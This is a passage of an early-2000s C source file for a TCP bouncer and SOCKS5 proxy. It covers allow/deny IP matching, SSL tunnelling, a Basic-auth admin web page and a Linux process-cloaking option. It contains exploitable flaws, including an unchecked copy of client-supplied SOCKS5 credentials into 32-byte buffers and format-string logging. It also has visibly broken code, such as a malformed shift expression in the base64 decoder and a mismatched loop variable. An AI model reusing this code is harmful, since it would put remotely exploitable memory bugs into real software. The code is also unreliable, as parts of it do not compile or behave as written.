{ oerror("send", __FILE__, __LINE__, i + 1); close_client_sockets(i); break; } clients[i].total_bytes += bytes; total_data += bytes; } } } } } } else if(z == ERROR) { oerror("select", __FILE__, __LINE__, 0); return(-1); } } } int matches(char *ip, char *mask) { char *tip, *tmask, *s; char seg1[4][4]; char seg2[4][4]; int i; tip = strdup(ip); if((s = strtok(tip, ".")) == NULL) { free(tip); return(FALSE); } strncpy(seg1[0], s, sizeof(s)); if((s = strtok(NULL, ".")) == NULL) { free(tip); return(FALSE); } strncpy(seg1[1], s, sizeof(s)); if((s = strtok(NULL, ".")) == NULL) { free(tip); return(FALSE); } strncpy(seg1[2], s, sizeof(s)); if((s = strtok(NULL, "\n")) == NULL) { free(tip); return(FALSE); } strncpy(seg1[3], s, sizeof(s)); free(tip); tmask = strdup(mask); if((s = strtok(tmask, ".")) == NULL) { free(tmask); return(FALSE); } strncpy(seg2[0], s, sizeof(s)); if((s = strtok(NULL, ".")) == NULL) { free(tmask); return(FALSE); } strncpy(seg2[1], s, sizeof(s)); if((s = strtok(NULL, ".")) == NULL) { free(tmask); return(FALSE); } strncpy(seg2[2], s, sizeof(s)); if((s = strtok(NULL, "\n")) == NULL) { free(tmask); return(FALSE); } strncpy(seg2[3], s, sizeof(s)); free(tmask); for(i = 0; i < 4; i++) { if((strncmp(seg2[i], "*", 1) != 0) && (strncmp(seg2[i], seg1[i], strlen(seg1[i])) != 0)) { return(FALSE); } } return(TRUE); } void bouncer_shutdown(int sig) { int i; if(sig != 0) { oline(stdout, CAUGHT_SIGNAL, timestamp(), sig); } else { oline(stdout, SHUTDOWN_REQUEST, timestamp()); } for(i = 0; i < MAX_CONNECTIONS + 1; i++) { close_client_sockets(i); } if(admin.aport) { oline(stdout, CLOSING_HTTP_LISTENING_SOCKET, timestamp()); socketclose(admin.ls, 0); } oline(stdout, CLOSING_LISTENING_SOCKET, timestamp()); socketclose(ls, 0); #ifndef _WIN32 remove(options.pidfile); #endif exit(0); } #ifndef _WIN32 void sig_handler(int sig, siginfo_t *sinf, void *ucon) { if((sig == SIGINT)||(sig == SIGTERM)) { bouncer_shutdown(sig); } } int daemonize(void) { pid_t pid; switch(pid = fork()) { case -1: oerror("fork", __FILE__, __LINE__, 0); return(-1); case 0: if(setsid() < 0) { oerror("setsid", __FILE__, __LINE__, 0); return(-1); } if((chdir("/")) < 0) { oerror("chdir", __FILE__, __LINE__, 0); return(-1); } umask(0); close(STDIN_FILENO); close(STDOUT_FILENO); close(STDERR_FILENO); switch(pid = fork()) { case -1: oerror("fork", __FILE__, __LINE__, 0); return(-1); case 0: return(0); default: return(-1); } default: return(-1); } } void write_pid(void) { int fd; char buffer[20]; if(strlen(options.pidfile) == 0) { snprintf(options.pidfile, sizeof(options.pidfile), BOUNCER_PIDFILE); } if((fd = open(options.pidfile, O_CREAT|O_WRONLY, 0600)) >= 0) { snprintf(buffer, sizeof(buffer), "%d\n", (int)getpid()); if(write(fd, buffer, strlen(buffer)) == ERROR) { oerror("write", __FILE__, __LINE__, 0); } close(fd); } } #else void send_msg(HWND hWnd, UINT uMsg, WPARAM wParam) { while(!PostMessage(hWnd, uMsg, wParam, 0)) { SleepEx(1000, TRUE); } } #endif static void oline(FILE *stream, char *fmt, ...) { #ifdef _WIN32 unsigned int msg_id, i; #endif char str[1024]; FILE *fp; va_list ap; va_start(ap, fmt); vsprintf(str, fmt, ap); va_end(ap); if((options.debug) || (strlen(options.logfile) != 0)) { if(options.hWnd) { #ifdef _WIN32 for(i = 0; i < strlen(str); ++i) { if(stream == stdout) { msg_id = WM_STD_OUT_CHAR; } else { msg_id = WM_STD_ERR_CHAR; } send_msg((HWND)options.hWnd, msg_id, (WPARAM)str[i]); } #endif } else { if(strlen(options.logfile) != 0) { if((fp = fopen(options.logfile, "a")) >= 0) { fprintf(fp, str); fflush(fp); fclose(fp); } } else { fprintf(stream, str); fflush(stream); } } } } void oerror(char *funct, char *file, int line, int i) { #ifdef _WIN32 DWORD errno = WSAGetLastError(); #endif if(i > 0) { oline(stderr, ERROR_CONNECTION, timestamp(), i, file, line, errno, funct, strerror(errno)); } else { oline(stderr, ERROR_NO_CONNECTION, timestamp(), file, line, errno, funct, strerror(errno)); } } char *timestamp(void) { time_t clock; struct tm *tm; static char ts[11]; time(&clock); tm = gmtime(&clock); strftime(ts, sizeof(ts), TIMESTAMP_FORMAT, tm); return(ts); } void close_client_sockets(int i) { float kb; float kbps; int seconds; char buffer[128]; if(clients[i].status != csBlank) { socketclose(clients[i].s[0], i); clients[i].s[0] = INVALID_SOCKET; socketclose(clients[i].s[1], i); clients[i].s[1] = INVALID_SOCKET; if(clients[i].total_bytes) { seconds = time(NULL) - clients[i].start_time; seconds = (1 > seconds) ? 1 : seconds; kb = clients[i].total_bytes / 1024.0; if(strncmp(format_float(kb), "0.00", 4) != 0) { kbps = kb / seconds; snprintf(buffer, sizeof(buffer), "%s Connection %d Closed (", timestamp(), i + 1); strcat(buffer, format_float(kb)); strncat(buffer, " KB, ", 5); strcat(buffer, format_float(kbps)); strncat(buffer, " KB/s)\n", 8); oline(stdout, buffer); } else { oline(stdout, CONNECTION_CLOSED, timestamp(), i + 1); } } else { if(clients[i].status == csAdmin) { oline(stdout, HTTP_CONNECTION_CLOSED, timestamp(), i + 1); } else { oline(stdout, CONNECTION_CLOSED, timestamp(), i + 1); } } clients[i].status = csBlank; } } char *format_float(float f) { char buffer[16]; static char obuffer[16]; char *p; char *no = NULL; char *precision = NULL; unsigned int c; unsigned int i; unsigned int j; int bcount = 0; memset(&buffer, 0, sizeof(buffer)); memset(&obuffer, 0, sizeof(obuffer)); snprintf(buffer, sizeof(buffer), "%.2f", f); if((p = strtok(buffer, ".")) != NULL) { no = p; if((p = strtok(NULL, "\r")) != NULL) { precision = p; } } if(((strlen(no) - 1) / 3) > 0) { if((c = strlen(no) % 3) != 0) { for(i = 0; i < c; i++) { obuffer[bcount++] = no[i]; } obuffer[bcount++] = ','; } for(i = c; i < strlen(no); i += 3) { if(i != c) { obuffer[bcount++] = ','; } for(j = 0; j < 3; j++) { obuffer[bcount++] = no[i + j]; } } strncat(obuffer, ".", 1); strncat(obuffer, precision, sizeof(precision)); bcount += 3; obuffer[bcount] = 0; } else { snprintf(obuffer, sizeof(obuffer), "%.2f", f); } return(obuffer); } int send_socks5_response(char *response, int i, int success, int bytes) { if(success) { response[1] = 0; } else { response[1] = 1; } if((send(clients[i].s[0], response, bytes, 0)) == ERROR) { oerror("send", __FILE__, __LINE__, i + 1); return(ERROR); } return(SUCCESS); } void initsocks(int i, char *t, int tcpnodelay) { int socks5_host_c; int bytes; int j, a; int ulen, plen; char user[32]; char password[32]; if((bytes = recv(clients[i].s[0], buffer, BUFFER_SIZE, 0)) == ERROR) { oerror("recv", __FILE__, __LINE__, i + 1); close_client_sockets(i); } else if(bytes == 0) { close_client_sockets(i); } else { if((buffer[0] == 5) && (buffer[1] == 1) && (buffer[2] == 0) && (bytes == 3)) { if(strlen(options.s_user) != 0) { send_socks5_response(buffer, i, FALSE, 2); close_client_sockets(i); oline(stdout, REJECTED_SOCKS5_FAIL, timestamp(), i + 1); } else { send_socks5_response(buffer, i, TRUE, 2); } } else if((buffer[0] == 5) && (buffer[1] == 2) && (buffer[2] == 0) && (buffer[3] == 2) && (bytes == 4)) { buffer[2] = 0; if((send(clients[i].s[0], buffer, 2, 0)) == ERROR) { oerror("send", __FILE__, __LINE__, i + 1); close_client_sockets(i); } } else if(buffer[0] == 1) { if(strlen(options.s_user) == 0) { buffer[1] = 0; if((send(clients[i].s[0], buffer, 2, 0)) == ERROR) { oerror("send", __FILE__, __LINE__, i + 1); close_client_sockets(i); } } else { ulen = buffer[1]; for(a = 0; a < ulen; a++) { user[a] = buffer[a + 2]; } user[ulen] = 0; plen = buffer[ulen + 2]; for(a = 0; a < plen; a++) { password[a] = buffer[(ulen + 3) + a]; } password[plen] = 0; if((strncmp(options.s_user, user, strlen(user)) == 0) && (strncmp(options.s_password, password, strlen(password)) == 0)) { buffer[1] = 0; if((send(clients[i].s[0], buffer, 2, 0)) == ERROR) { oerror("send", __FILE__, __LINE__, i + 1); close_client_sockets(i); } } else { buffer[1] = 1; if((send(clients[i].s[0], buffer, 2, 0)) == ERROR) { oerror("send", __FILE__, __LINE__, i + 1); close_client_sockets(i); } else { oline(stdout, REJECTED_SOCKS5_FAIL, timestamp(), i + 1); close_client_sockets(i); } } } } else if((buffer[0] == 5)&&(buffer[1] == 1)&&(buffer[2] == 0)&&(buffer[3] == 1)) { memset(&clients[i].socks5_response, 0, sizeof(clients[i].socks5_response)); for(j = 0; j < bytes; j++) { clients[i].socks5_response[j] = buffer[j]; } clients[i].socks5_bytes = bytes; if(strlen(t) == 0) { snprintf(clients[i].socks5_dest_host, sizeof(clients[i].socks5_dest_host), "%d.%d.%d.%d", (unsigned int)(buffer[4] & 0xFF), (unsigned int)(buffer[5] & 0xFF), (unsigned int)(buffer[6] & 0xFF), (unsigned int)(buffer[7] & 0xFF)); snprintf(clients[i].socks5_dest_port, sizeof(clients[i].socks5_dest_port), "%d", ((unsigned int)(buffer[8] & 0xFF) * 256) + (unsigned int)(buffer[9] & 0xFF)); } else { snprintf(clients[i].tunnel, sizeof(clients[i].tunnel), "%d.%d.%d.%d:%d", (unsigned int)(buffer[4] & 0xFF), (unsigned int)(buffer[5] & 0xFF), (unsigned int)(buffer[6] & 0xFF), (unsigned int)(buffer[7] & 0xFF), ((unsigned int)(buffer[8] & 0xFF) * 256) + (unsigned int)(buffer[9] & 0xFF)); } socks_connect(i, t, tcpnodelay); } else if((buffer[0] == 5)&&(buffer[1] == 1)&&(buffer[2] == 0)&&(buffer[3] == 3)) { memset(&clients[i].socks5_response, 0, sizeof(clients[i].socks5_response)); for(j = 0; j < bytes; j++) { clients[i].socks5_response[j] = buffer[j]; } clients[i].socks5_bytes = bytes; socks5_host_c = (unsigned int)(buffer[4] & 0xFF); memset(&clients[i].socks5_dest_host, 0, sizeof(clients[i].socks5_dest_host)); for(j = 0; j < socks5_host_c; j++) { clients[i].socks5_dest_host[j] = buffer[j + 5]; } clients[i].socks5_dest_host[j + 1] = '\0'; snprintf(clients[i].socks5_dest_port, sizeof(clients[i].socks5_dest_port), "%d", ((unsigned int)(buffer[j + 5] & 0xFF) * 256) + (unsigned int)(buffer[j + 6] & 0xFF)); if(strlen(t) != 0) { snprintf(clients[i].tunnel, sizeof(clients[i].tunnel), "%s:%s", clients[i].socks5_dest_host, clients[i].socks5_dest_port); } socks_connect(i, t, tcpnodelay); } else { oline(stdout, SOCKS5_UNKNOWN_DATA, timestamp(), i + 1); close_client_sockets(i); } } } void socks_connect(int i, char *t, int tcpnodelay) { char *cp = NULL; if(strlen(t) == 0) { snprintf(options.dest_host, sizeof(options.dest_host), "%s", clients[i].socks5_dest_host); snprintf(options.dest_port, sizeof(options.dest_port), "%s", clients[i].socks5_dest_port); } connect_to(i, options.dest_host, (int)strtol(options.dest_port, &cp, 10), 1, tcpnodelay); } char *base64e(char *data) { static unsigned char Base64Map[64] = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"; static char buffer[128]; unsigned int i; int bits = 0; int count = 0; int cols = 0; int bcount = 0; memset(&buffer, 0, sizeof(buffer)); for(i = 0; i < strlen(data); i++) { bits += (int)data[i]; count++; if(count == 3) { buffer[bcount++] = Base64Map[bits >> 18]; buffer[bcount++] = Base64Map[(bits >> 12) & 0x3F]; buffer[bcount++] = Base64Map[(bits >> 6) & 0x3F]; buffer[bcount++] = Base64Map[bits & 0x3F]; cols += 4; if(cols == 72) { buffer[bcount++] = '\n'; cols = 0; } bits = 0; count = 0; } else { bits <<= 8; } } if(count != 0) { bits <<= 16 - (8 * count); buffer[bcount++] = Base64Map[bits >> 18]; buffer[bcount++] = Base64Map[(bits >> 12) & 0x3F]; if(count == 1) { buffer[bcount++] = '='; buffer[bcount++] = '='; } else { buffer[bcount++] = Base64Map[(bits >> 6) & 0x3F]; buffer[bcount++] = '='; } } buffer[bcount] = 0; return(buffer); } void socketclose(SOCKET s, int i) { #ifdef _WIN32 if(s != INVALID_SOCKET) { if((closesocket(s)) == ERROR) { oerror("closesocket", __FILE__, __LINE__, i + 1); } } #else if(s != INVALID_SOCKET) { if((close(s)) == ERROR) { oerror("close", __FILE__, __LINE__, i + 1); } } #endif } void show_version(void) { oline(stdout, "%s %s\n", APPNAME, VERSION); oline(stdout, "Build Date: %s %s\n", __DATE__, __TIME__); #ifdef __VERSION__ oline(stdout, "Build Info: %s\n", __VERSION__); #endif oline(stdout, "Copyright (c) 2000, 2001 Chris Mason\n"); oline(stdout, "All Rights Reserved\n\n"); } void show_usage(void) { oline(stdout, "\t--port Port\n"); oline(stdout, "\t--destination Host:Port\n"); oline(stdout, "\t--socks5\n"); oline(stdout, "\t[--bind IP]\n"); oline(stdout, "\t[--tunnel Host:Port]\n"); oline(stdout, "\t[--logfile File]\n"); #ifndef _WIN32 oline(stdout, "\t[--pidfile File]\n"); #else oline(stdout, "\t[--gui hWnd]\n"); #endif oline(stdout, "\t[--aport Port]\n"); oline(stdout, "\t[--abind IP]\n"); oline(stdout, "\t[--allow IP Mask]\n"); oline(stdout, "\t[--deny IP Mask]\n"); #ifdef LINUX oline(stdout, "\t[--cloak Cloaked Process]\n"); #endif oline(stdout, "\t[--t_user User]\n"); oline(stdout, "\t[--t_password Password]\n"); oline(stdout, "\t[--s_user User]\n"); oline(stdout, "\t[--s_password Password]\n"); oline(stdout, "\t[--a_user User]\n"); oline(stdout, "\t[--a_password Password]\n"); oline(stdout, "\t[--tcpnodelay]\n"); oline(stdout, "\t[--nodebug]\n"); oline(stdout, "\t[--daemon]\n\n"); } int allowed(int i, int adp, int narules, int ndrules) { int outcome = csAllowed; int j; int k = 0; if((narules > 0) && (ndrules == 0)) { outcome = csRejected; for(j = 0; j < narules; j++) { if(matches((void *)inet_ntoa(clients[i].SockAddrIn.sin_addr), arules[j])) { outcome = csAllowed; break; } } } else if((narules == 0) && (ndrules > 0)) { outcome = csAllowed; for(j = 0; j < ndrules; j++) { if(matches((void *)inet_ntoa(clients[i].SockAddrIn.sin_addr), drules[j])) { outcome = csRejected; break; } } } else if((narules > 0) && (ndrules > 0)) { switch(adp) { case DEFAULT_POLICY_ALLOW: for(j = 0; j < ndrules; j++) { if(matches((void *)inet_ntoa(clients[i].SockAddrIn.sin_addr), drules[j])) { outcome = csRejected; for(k = 0; k < narules; k++) { if(matches((void *)inet_ntoa(clients[i].SockAddrIn.sin_addr), arules[k])) { outcome = csAllowed; break; } } } } break; case DEFAULT_POLICY_DENY: for(j = 0; j < narules; j++) { if(matches((void *)inet_ntoa(clients[i].SockAddrIn.sin_addr), arules[j])) { outcome = csAllowed; for(j = 0; k < ndrules; k++) { if(matches((void *)inet_ntoa(clients[i].SockAddrIn.sin_addr), drules[k])) { outcome = csRejected; break; } } } } } } return(outcome); } int connect_to(int i, char *dest_host, int dest_port, int socks5, int tcpnodelay) { int tcp_nodelay = TRUE; struct hostent *hp; if((clients[i].s[1] = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == INVALID_SOCKET) { oerror("socket", __FILE__, __LINE__, i + 1); if(socks5) { send_socks5_response(clients[i].socks5_response, i, FALSE, clients[i].socks5_bytes); } close_client_sockets(i); return(-1); } if(tcpnodelay) { if((setsockopt(clients[i].s[1], IPPROTO_TCP, TCP_NODELAY, (char *)&tcp_nodelay, sizeof(tcp_nodelay))) == ERROR) { oerror("setsockopt", __FILE__, __LINE__, i + 1); if(socks5) { send_socks5_response(clients[i].socks5_response, i, FALSE, clients[i].socks5_bytes); } close_client_sockets(i); return(-1); } } memset(&clients[i].SockAddrOut, 0, sizeof(struct sockaddr_in)); clients[i].SockAddrOut.sin_family = AF_INET; if(isdigit(*dest_host)) { clients[i].SockAddrOut.sin_addr.s_addr = inet_addr(dest_host); } else { if((hp = gethostbyname(dest_host)) == NULL) { oerror("gethostbyname", __FILE__, __LINE__, i + 1); if(socks5) { send_socks5_response(clients[i].socks5_response, i, FALSE, clients[i].socks5_bytes); } close_client_sockets(i); return(-1); } clients[i].SockAddrOut.sin_addr = *(struct in_addr *)hp->h_addr_list[0]; } clients[i].SockAddrOut.sin_port = htons(dest_port); oline(stdout, CONNECTION_ATTEMPT, timestamp(), i + 1, inet_ntoa(clients[i].SockAddrOut.sin_addr), dest_port); if(set_non_blocking(clients[i].s[1], i) == -1) { if(socks5) { send_socks5_response(clients[i].socks5_response, i, FALSE, clients[i].socks5_bytes); } close_client_sockets(i); return(-1); } if(connect(clients[i].s[1], (const struct sockaddr *)&clients[i].SockAddrOut, sizeof(struct sockaddr_in)) == -1) { #ifndef _WIN32 if((errno != EAGAIN) && (errno != EINPROGRESS)) { #else if(WSAGetLastError() != WSAEWOULDBLOCK) { #endif oerror("connect", __FILE__, __LINE__, i + 1); if(socks5) { send_socks5_response(clients[i].socks5_response, i, FALSE, clients[i].socks5_bytes); } close_client_sockets(i); return(-1); } } else { if(set_blocking(clients[i].s[1], i) == -1) { if(socks5) { send_socks5_response(clients[i].socks5_response, i, FALSE, clients[i].socks5_bytes); } close_client_sockets(i); return(-1); } oline(stdout, CONNECTION_CONNECTED, timestamp(), i + 1, inet_ntoa(clients[i].SockAddrOut.sin_addr), dest_port); return(0); } clients[i].status = csConnecting; return(0); } void ssl_tunnel(int i, char *destination, char *auth_string, int socks5) { oline(stdout, SSL_TUNNELLING, timestamp(), i + 1, destination); if(auth_string != NULL) { snprintf(buffer, sizeof(buffer), SSL_CONNECT_STRING_AUTH, destination, auth_string); } else { snprintf(buffer, sizeof(buffer), SSL_CONNECT_STRING_NOAUTH, destination); } if((send(clients[i].s[1], buffer, strlen(buffer), 0)) == ERROR) { oerror("send", __FILE__, __LINE__, i + 1); if(socks5) { send_socks5_response(clients[i].socks5_response, i, FALSE, clients[i].socks5_bytes); } close_client_sockets(i); } clients[i].status = csAuthenticating; } int set_non_blocking(SOCKET s, int i) { #ifdef _WIN32 unsigned long nonblock[] = { 1 }; if(ioctlsocket(s, FIONBIO, nonblock) == -1) { oerror("ioctlsocket", __FILE__, __LINE__, i + 1); #else if(fcntl(s, F_SETFL, O_NONBLOCK) == -1) { oerror("fcntl", __FILE__, __LINE__, i + 1); #endif close_client_sockets(i); return(-1); } return(0); } int set_blocking(SOCKET s, int i) { #ifdef _WIN32 unsigned long nonblock[] = { 0 }; if(ioctlsocket(s, FIONBIO, nonblock) == -1) { oerror("ioctlsocket", __FILE__, __LINE__, i + 1); #else if(fcntl(s, F_SETFL, 0) == -1) { oerror("fcntl", __FILE__, __LINE__, i + 1); #endif close_client_sockets(i); return(-1); } return(0); } int examine_http_request(char *buffer) { char *copy = strdup(buffer); char *p; if((p = strtok(copy, "\r\n")) != NULL) { if(http_authorized(buffer)) { if(strncmp(p, "GET / HTTP/1.1", 14) == 0) { free(copy); return(HTTP_INDEX); } else if(strncmp(p, "GET /shutdown HTTP/1.1", 22) == 0) { free(copy); return(HTTP_SHUTDOWN); } else if(strncmp(p, "GET /list HTTP/1.1", 18) == 0) { free(copy); return(HTTP_LIST); } } else { free(copy); return(HTTP_AUTH_HEADERS); } } else { free(copy); } return(-1); } int http_authorized(char *p) { char auth[128]; char *q, *r, *s, *t; if((q = strstr(p, "Authorization: Basic")) != NULL) { q += 21; if((r = strtok(q, "\r\n")) != NULL) { memset(&auth, 0, sizeof(auth)); if(base64d(r, auth) != -1) { if((s = strtok(auth, ":")) != NULL) { if((t = strtok(NULL, "\n")) != NULL) { if((strncmp(s, admin.username, strlen(admin.username)) == 0) && (strncmp(t, admin.password, strlen(admin.password)) == 0)) { return(1); } } } } } } return(0); } int base64d(char *data, char *target) { int length = strlen(data); int i; int result = 0; int a, b, c, d; unsigned long l; static unsigned char data_ascii2bin[128] = { 0xFF,0xFF,0xFF,0xFF,0xFF,0xFF,0xFF,0xFF, 0xFF,0xE0,0xF0,0xFF,0xFF,0xF1,0xFF,0xFF, 0xFF,0xFF,0xFF,0xFF,0xFF,0xFF,0xFF,0xFF, 0xFF,0xFF,0xFF,0xFF,0xFF,0xFF,0xFF,0xFF, 0xE0,0xFF,0xFF,0xFF,0xFF,0xFF,0xFF,0xFF, 0xFF,0xFF,0xFF,0x3E,0xFF,0xF2,0xFF,0x3F, 0x34,0x35,0x36,0x37,0x38,0x39,0x3A,0x3B, 0x3C,0x3D,0xFF,0xFF,0xFF,0x00,0xFF,0xFF, 0xFF,0x00,0x01,0x02,0x03,0x04,0x05,0x06, 0x07,0x08,0x09,0x0A,0x0B,0x0C,0x0D,0x0E, 0x0F,0x10,0x11,0x12,0x13,0x14,0x15,0x16, 0x17,0x18,0x19,0xFF,0xFF,0xFF,0xFF,0xFF, 0xFF,0x1A,0x1B,0x1C,0x1D,0x1E,0x1F,0x20, 0x21,0x22,0x23,0x24,0x25,0x26,0x27,0x28, 0x29,0x2A,0x2B,0x2C,0x2D,0x2E,0x2F,0x30, 0x31,0x32,0x33,0xFF,0xFF,0xFF,0xFF,0xFF, }; if((!target) || (!data) || (length <= 0)) { return(-1); } while((conv_ascii2bin(*data) == BASE64_WS) && (length > 0)) { data++; length--; } while((length > 3) && (BASE64_NOT_BASE64(conv_ascii2bin(data[length - 1])))) { length--; } if((length % 4) != 0) { return(-1); } for(i = 0; i < length; i += 4) { a = conv_ascii2bin(*(data++)); b = conv_ascii2bin(*(data++)); c = conv_ascii2bin(*(data++)); d = conv_ascii2bin(*(data++)); if((a & 0x80) || (b & 0x80) || (c & 0x80) || (d & 0x80)) { return(-1); } l = ((((unsigned long)a) << 18L) | (((unsigned long) << 12L) | (((unsigned long)c) << 6L) | (((unsigned long)d))); *(target++) = (unsigned char)(l >> 16L) & 0xFF; *(target++) = (unsigned char)(l >> 8L) & 0xFF; *(target++) = (unsigned char)(l) & 0xFF; result += 3; } return(--result); } void send_auth_headers(SOCKET s, int i) { char buffer[1024]; snprintf(buffer, sizeof(buffer), "HTTP/1.1 401 Authorization Required\r\n"); strcat(buffer, "WWW-Authenticate: Basic realm=\"Bouncer Admin\"\r\n"); strcat(buffer, "Keep-Alive: timeout=15, max=100\r\n"); strcat(buffer, "Connection: Keep-Alive\r\n"); strcat(buffer, "Transfer-Encoding: chunked\r\n"); strcat(buffer, "Content-Type: text/html; charset=iso-8859-1\r\n\r\n"); strcat(buffer, "1cf\r\n"); strcat(buffer, "<html><head><title>401 Authorization Required</title>\r\n"); strcat(buffer, "</head><body><h1>Authorization Required</h1><p>This server could not verify that you are authorized to access the document requested. Either you supplied the wrong credentials (e.g., bad password), or your browser doesn't understand how to supply the credentials required.</p></body></html>\r\n"); if(send(s, buffer, strlen(buffer), 0) == -1) { oerror("send", __FILE__, __LINE__, i + 1); } } void send_index(SOCKET s, int i) { char buffer[1024]; char sbuffer[512]; snprintf(buffer, sizeof(buffer), "HTTP/1.1 200 OK\r\n\r\n"); strcat(buffer, "<html><head><title>Bouncer Admin</title><style>\r\n"); strcat(buffer, "body { font-family: Tahoma, Arial, Sans-Serif; font-size: 8pt; background-color: #1C344F; color: #FFFFFF }\r\n"); strcat(buffer, "a:link { color: white }\r\n"); strcat(buffer, "a:visited { color:white }\r\n"); strcat(buffer, "a:hover { color:red }\r\n"); strcat(buffer, "</style></head><body><p>Bouncer Admin 0.1 (Beta 1)<br>Copyright © 2001 Chris Mason</p>\r\n"); snprintf(sbuffer, sizeof(sbuffer), "<p>Bouncer Uptime: %s<br>Total Connections: %ld<br>Total Data Throughput: %s KB</p>\r\n", format_time(time(NULL) - init_time), connections, format_float(total_data / 1024.0)); strcat(buffer, sbuffer); strcat(buffer, "<p><a href=\"/list\">List Connections</a><br><a href=\"/shutdown\">Shutdown Bouncer</a></p>\r\n"); strcat(buffer, "</body></html>\r\n"); if(send(s, buffer, strlen(buffer), 0) == -1) { oerror("send", __FILE__, __LINE__, i + 1); } } void send_list(SOCKET s, int i, int socks5) { char buffer[16384]; char sbuffer[1024]; char state[32]; char destination[32]; int a; snprintf(buffer, sizeof(buffer), "HTTP/1.1 200 OK\r\n\r\n"); strcat(buffer, "<html><head><title>Bouncer Admin</title><style>\r\n"); strcat(buffer, "body { font-family: Tahoma, Arial, Sans-Serif; font-size: 8pt; background-color: #1C344F; color: #FFFFFF }\r\n"); strcat(buffer, "table { font-family: Tahoma, Arial, Sans-Serif; font-size: 8pt; background-color: #1C344F; color: #FFFFFF }\r\n"); strcat(buffer, "a:link { color: white }\r\n"); strcat(buffer, "a:visited { color:white }\r\n"); strcat(buffer, "a:hover { color:red }\r\n"); strcat(buffer, "</style></head><body><p>Bouncer Admin 0.1 (Beta 1)<br>Copyright © 2001 Chris Mason</p>\r\n<p>"); if((!socks5) || (strlen(options.t) != 0)) { strcat(buffer, "<p>"); if(!socks5) { snprintf(sbuffer, sizeof(sbuffer), "Destination Host: %s<br>", options.destination); strcat(buffer, sbuffer); } if(strlen(options.t) != 0) { snprintf(sbuffer, sizeof(sbuffer), "SSL Tunnel Host: %s", options.tunnel); strcat(buffer, sbuffer); } strcat(buffer, "</p>"); } if(socks5) { strcat(buffer, "<table class=body border=\"1\"><tr bgcolor=\"RED\"><th align=\"center\">Slot</th><th align=\"center\">Status</th><th align=\"center\">Source</th><th align=\"center\">Destination</th><th align=\"center\">Time Connected</th><th align=\"center\">Data Transferred</th></tr>"); } else { strcat(buffer, "<table class=body border=\"1\"><tr bgcolor=\"RED\"><th align=\"center\">Slot</th><th align=\"center\">Status</th><th align=\"center\">Source</th><th align=\"center\">Time Connected</th><th align=\"center\">Data Transferred</th></tr>"); } for(a = 0; a < MAX_CONNECTIONS; a++) { if(clients[a].status != csBlank) { switch(clients[a].status) { case csUnknown: snprintf(state, sizeof(state), "Unknown"); break; case csConnecting: snprintf(state, sizeof(state), "Connecting"); break; case csSocks: snprintf(state, sizeof(state), "Socks Authenticating"); break; case csAuthenticating: snprintf(state, sizeof(state), "SSL Tunnelling"); break; case csAuthenticated: snprintf(state, sizeof(state), "Active Connection"); break; case csAdmin: snprintf(state, sizeof(state), "Admin"); break; } if(socks5) { if(clients[a].status == csAdmin) { snprintf(sbuffer, sizeof(sbuffer), LIST_ADMIN_SOCKS, a + 1, state, inet_ntoa(clients[a].SockAddrIn.sin_addr), format_time(time(NULL) - clients[a].start_time)); } else { if(clients[a].status == csSocks) { snprintf(destination, sizeof(destination), " "); } else { snprintf(destination, sizeof(destination), "%s:%s", clients[a].socks5_dest_host, clients[a].socks5_dest_port); } snprintf(sbuffer, sizeof(sbuffer), LIST_SOCKS, a + 1, state, inet_ntoa(clients[a].SockAddrIn.sin_addr), destination, format_time(time(NULL) - clients[a].start_time), format_float(clients[a].total_bytes / 1024.0)); } } else { if(clients[a].status == csAdmin) { snprintf(sbuffer, sizeof(sbuffer), LIST_ADMIN, a + 1, state, inet_ntoa(clients[a].SockAddrIn.sin_addr), format_time(time(NULL) - clients[a].start_time)); } else { snprintf(sbuffer, sizeof(sbuffer), LIST, a + 1, state, inet_ntoa(clients[a].SockAddrIn.sin_addr), format_time(time(NULL) - clients[a].start_time), format_float(clients[a].total_bytes / 1024.0)); } } strcat(buffer, sbuffer); } } strcat(buffer, "</table></p><p><a href=\"/\">Back</a></body></html>\r\n"); if(send(s, buffer, strlen(buffer), 0) == -1) { oerror("send", __FILE__, __LINE__, i + 1); } } void send_shutdown(SOCKET s, int i) { char buffer[1024]; snprintf(buffer, sizeof(buffer), "HTTP/1.1 200 OK\r\n\r\n"); strcat(buffer, "<html><head><title>Bouncer Admin</title><style>\r\n"); strcat(buffer, "body { font-family: Tahoma, Arial, Sans-Serif; font-size: 8pt; background-color: #1C344F; color: #FFFFFF }\r\n"); strcat(buffer, "a:link { color: white }\r\n"); strcat(buffer, "a:visited { color:white }\r\n"); strcat(buffer, "a:hover { color:red }\r\n"); strcat(buffer, "</style></head><body><p>Bouncer Admin 0.1 (Beta 1)<br>Copyright © 2001 Chris Mason</p>\r\n"); strcat(buffer, "<p>Bouncer Successfully Shutdown</p>\r\n"); strcat(buffer, "</body></html>\r\n"); if(send(s, buffer, strlen(buffer), 0) == -1) { oerror("send", __FILE__, __LINE__, i + 1); } } char *format_time(time_t t) { int minutes = 0; int hours = 0; int days = 0; int weeks = 0; static char buffer[64]; memset(&buffer, 0, sizeof(buffer)); while(t >= 60) { minutes++; t -= 60; } while(minutes >= 60) { hours++; minutes -= 60; } while(hours >= 24) { days++; hours -= 24; } while(days >= 7) { weeks++; days -= 7; } if(weeks == 0) { if(days == 0) { if(hours == 0) { if(minutes == 0) { snprintf(buffer, sizeof(buffer), "%lds", (unsigned long)t); } else { snprintf(buffer, sizeof(buffer), "%dm, %lds", minutes, (unsigned long)t); } } else { snprintf(buffer, sizeof(buffer), "%dh, %dm, %lds", hours, minutes, (unsigned long)t); } } else { snprintf(buffer, sizeof(buffer), "%dd, %dh, %dm, %lds", days, hours, minutes, (unsigned long)t); } } else { snprintf(buffer, sizeof(buffer), "%dw, %dd, %dh, %dm, %lds", weeks, days, hours, minutes, (unsigned long)t); } return(buffer); } void initialise_options(void) { options.port = 0; options.socks5 = 0; options.hWnd = 0; options.daemon = 0; options.adp = 0; options.debug = 1; options.tcpnodelay = 0; admin.aport = 0; memset(&options.d, 0, sizeof(options.d)); memset(&options.t, 0, sizeof(options.t)); memset(&options.bind, 0, sizeof(options.bind)); memset(&options.dest_host, 0, sizeof(options.dest_host)); memset(&options.dest_port, 0, sizeof(options.dest_port)); memset(&options.destination, 0, sizeof(options.destination)); memset(&options.tunnel, 0, sizeof(options.tunnel)); memset(&options.pidfile, 0, sizeof(options.pidfile)); memset(&options.logfile, 0, sizeof(options.logfile)); memset(&options.t_user, 0, sizeof(options.t_user)); memset(&options.t_password, 0, 